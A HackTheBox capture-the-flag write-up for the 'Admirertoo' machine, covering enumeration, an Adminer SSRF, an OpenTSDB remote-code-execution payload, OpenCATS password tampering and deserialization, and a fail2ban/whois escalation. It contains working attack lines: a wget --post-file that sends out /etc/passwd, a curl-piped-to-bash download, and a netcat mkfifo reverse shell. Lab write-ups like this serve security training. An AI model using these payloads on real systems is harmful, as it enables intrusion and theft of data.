CTF-Writeups/HackTheBox/Adminertoo.md
2022-05-28 20:49:26 +05:00

12 KiB

HackTheBox-Admirertoo

NMAP

PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 99:33:47:e6:5f:1f:2e:fd:45:a4:ee:6b:78:fb:c0:e4 (RSA)
|   256 4b:28:53:64:92:57:84:77:5f:8d:bf:af:d5:22:e1:10 (ECDSA)
|_  256 71:ee:8e:e5:98:ab:08:43:3b:86:29:57:23:26:e9:10 (ED25519)
80/tcp    open     http           Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Admirer
4242/tcp  filtered vrml-multi-use
16010/tcp filtered unknown
16030/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

On the web serve we can see a default tempalate which is used

Running gobuster to fuzz for files , it didn't showed anything interesting

We can see a chat bubble on the page but it doesn't really make any requests

Making an invalid request will show a 404 page error but it will also reveal a domain name

Using this we can try to enumerate subdomains using wfuzz ,so add admirer-gallery.htb into /etc/hosts file

 wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://admirer-gallery.htb' -H "Host: FUZZ.admirer-gallery.htb" --hl 268

Checking the source of the page we can see that the password is already in the hidden parameter

Logging in , it shows that this user doesn't have permissions so we can only see what's in the database and there wasn't anything interesting there

We only see the gallery table which had just the pictures that we saw on the adminer gallery page

So looking for exploits regarding adminer 4.7.8 , it lead to a SSRF vulnerability

https://github.com/advisories/GHSA-x5r2-hj5c-8jx6

Let's try to replicate it , from the document it also has given the script which was used in the poc

So I intercepted the login request ,and tried the adminer drivers one by one to see on which one we'll get a request

https://github.com/vrana/adminer/tree/master/adminer/drivers

change the driver to elastic and change server to our IP and got a callback

And if we go back to login page we'll see that the adminer galley source code gets reflected on the db page

If we look at our scan we saw few filtered ports

Making a request to port 4242 will show us a different response

From the respone we see that on port 4242 ,OpenTSDB is being used and looking up on google it does have a remote code execution through a GET parameter

I copied the payload from here

https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2020/CVE-2020-35476.yaml

And change m paramter to http.stats.web.hits

/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system('wget%20--post-file%20/etc/passwd%20http://10.10.14.71/:2222/')%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json

Through this payload I am just checking if I can read /etc/passwd file, running this with the same python file

Looking at our netcat listener we'll see that we have sent /etc/passwd file on our port 2222, to get a shell I tried running the reverse shell command directory with in the system arugment but it wasn't being executed so used curl to download this script shell having a netcat reverse shell and pipe it to bash to execute it

#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.71 2222 >/tmp/f
sudo python2 exploit.py -p 80 "http://10.10.11.137:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system('curl%20http://10.10.14.71:4444/shell.sh%7Cbash')%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"

Stabilizing the shell with python3

I tried to run sudo -l to see if I can run anything as another user but it failed

If we go into adminer's directory , there's a file named servers.php which has credentials to database

Using this password for jennifer account , we'll be able to switch to that account

Checked for SUID binaries but there wasn't any custom binary or some binary which isn't to be SUID only the default ones were shown, looking at local ports we can see port 8080 which is open

Making a request to that port will tell that's using a software known as OpenCATS

So we need to do port forwarding so that we can access this through our browser

ssh -L 3333:127.0.0.1:8080 jennifer@10.10.11.137

Here -L tells to do local port forwarding , the first port that we are specfying is the port that will have the fort fowarded connection from the target machine's port, after that we'll specifiy localhost address so because we want to forward a port from the target machine and then we'll specify from which port we want to have the traffic forwarded which wil be port 8080 on which opencats is running

Visting the port on the browser will show us the login page for opencats

Also looking for database credentials we find credentials for database that opencats is using in /opt/opencats/config.php

Selecting the users table we can see two users out of which we already have jennifer's password but we can change admin's password by updating the password hash

So first generate a md5 hash of any text that you want to set password for admin user

Now update the password value for admin user in the table

UPDATE user SET password = '1bc29b36f623ba82aaf6724fd3b16718'  
WHERE user_id=1;

And now we can login as admin user as we have changed his password from the database

Now this version of opencats was vulnerable to php deserialization attack

https://snoopysecurity.github.io/web-application-security/2021/01/16/09_opencats_php_object_injection.html

But issue is we don't know what should be our payload as we have port forwarded this and it's not running in /var/www/html and we don't know as which user this site is running as , looking in /opt/opencats we saw a file which is owned by group devel

And this user isn't allowed to login

So could be that it's running as devel user and we need to see which folder is owned by this group so we can write a file to it

Also in /etc there's a folder named fail2ban that is running on ssh , looking at the configuration for that we can see it blocks the IP for 1 minute if there's a failure for root user

There's an RCE in fail2ban service so we can abuse that by writing whois.conf file in/usr/local/etc through opencats php deserialization

https://github.com/fail2ban/fail2ban/security/advisories/GHSA-m985-3f3v-cwmm

First creating whois.conf file on our local machine with our IP address

Running phpggc to generate a serialized object

From opencats activites, clicking and clicking any column name to intercept the request

Replacing the serliaized object in ActivityDataGrid

With this we are able to create a whois.conf fifle but it isn't in the correct format

And if we do whois IP it's going to give an error

The reason is because whois.conf works having regex pattern entries

https://github.com/rfc1036/whois/blob/next/whois.conf

So we have to make a regex pattern out of this file we get having

[{"Expires":1,"Discard":false,"Value":"10.10.16.24\n"}]

We need to add }] which will make this string

[{"Expires":1,"Discard":false,"Value":"}]

In regex [] these brackets are considered to match everything

}] IP

Now we need to make the IP in a regex pattern followed by a OR operator for comparing two regex patterns

}]| [IP]

Now when we run whois IP we'll get a response on port 43 (which is a port used by whois)

Following the fail2ban rce, we need to create a file which will respond to the request for whois on port 43 having our reverse shell starting with ~| because that will cause commands to be executed

We need to listen on this port while serving this file in response

I had trouble with running this command with nc so had to install ncat don't know what's the major difference but with ncat it was working

Listening on the port where we will get a connection back from the reverse shell

And lastly trigerring fail2ban by logging in with root user with multiple failed attemps which will cause whois to run on our IP that will respond on the request on port 43 with the reverse shell and executing it

References